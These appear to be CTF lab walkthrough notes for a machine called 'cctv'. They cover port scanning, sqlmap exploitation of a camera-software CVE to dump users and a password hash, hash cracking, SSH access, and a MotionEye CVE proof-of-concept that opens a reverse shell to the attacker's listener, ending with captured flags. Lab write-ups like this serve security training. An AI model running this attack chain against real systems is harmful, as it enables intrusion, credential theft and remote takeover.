NMAP

nmap -sC -sV -T4 -p- 10.129.188.61

22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
80/tcp open  http    Apache httpd 2.4.58
|_http-title: Did not follow redirect to http://cctv.htb/
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

sudo nmap -A -sU --top-port 100 10.129.188.61

68/udp open|filtered dhcpc

HTTP (80)

• Login page

• Default Credentials admin:admin

• Instance of ZoneReminder Version 1.37.63

• Vulnerable to CVE-2024-51428

sqlmap -u "http://10.129.188.61/zm/index.php?view=request&request=event&action=removetag&tid=1" \
    --cookie="ZMSESSID=bqj0kajl2qb613gaa0tqs4a7qc" \
    -p tid --dbms=mysql --batch --dbs
    
available databases [3]:
[*] information_schema
[*] performance_schema
[*] zm


sqlmap -u "http://10.129.188.61/zm/index.php?view=request&request=event&action=removetag&tid=1"     --cookie="ZMSESSID=ukutcmjmofq9llm1bo4mpekk44"     -p tid --dbms=mysql --batch -D zm -T Users -C "Username" --dump


+------------+
| Username   |
+------------+
| admin      |
| mark       |
| superadmin |
+------------+


sqlmap -u "http://10.129.188.61/zm/index.php?view=request&request=event&action=removetag&tid=1"     --cookie="ZMSESSID=ukutcmjmofq9llm1bo4mpekk44"     -p tid --dbms=mysql --batch -D zm -T Users -C "Password" --where="Username='mark'" --dump

mark:$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG

• Crack Hash

echo '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG' > hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt

Shell as Mark

ssh mark@10.129.188.61
opensesame

• Transfer LinPeas

scp linpeas.sh mark@10.129.188.61:/tmp 
tcp        0      0 127.0.0.1:8765          0.0.0.0:*               LISTEN      -

• MotionEye version 4.7.1 is running

• Port Forward to local machine

ssh -L 8765:127.0.0.1:8765 mark@10.129.188.61

• Access via 127.0.0.1:8765

• Checking MotionEye Config

find / -type f -name "*motioneye.conf"

/etc/motioneye/motioneye.conf

mark@cctv:/etc/motioneye$ ls -la
total 28
drwxr-xr-x   2 motion motion  4096 Nov  7 23:40 .
drwxr-xr-x 141 root   root   12288 Mar  2 10:05 ..
-rw-r--r--   1 motion motion  2287 Nov  8 01:16 camera-1.conf
-rw-r--r--   1 motion motion   278 Nov  8 01:16 motion.conf
-rw-r--r--   1 motion motion  3012 Nov  7 22:46 motioneye.conf
mark@cctv:/etc/motioneye$ cat motion.conf
# @admin_username admin
# @normal_username user
# @admin_password 989c5a8ee87a0e9521ec81a79187d162109282f0
# @lang en
# @enabled on
# @normal_password
setup_mode off
webcontrol_port 7999
webcontrol_interface 1
webcontrol_localhost on
webcontrol_parms 2

• Credentials for MotionEye admin:989c5a8ee87a0e9521ec81a79187d162109282f0

• Find Exploit for MotionEye CVE-2025-60787

• https://github.com/lil0xplorer/CVE-2025-60787_PoC

python3 exploit.py -t http://127.0.0.1:8765 -p 989c5a8ee87a0e9521ec81a79187d162109282f0 -lh 10.10.14.63 -lp 4444

rlwrap nc -nvlp 4444

Shell as Root

cat user.txt
3ec3c2d8f16db502f6e91f33e28f91c0

cat root.txt
c561934fad992a87b1ab6f86eb02792f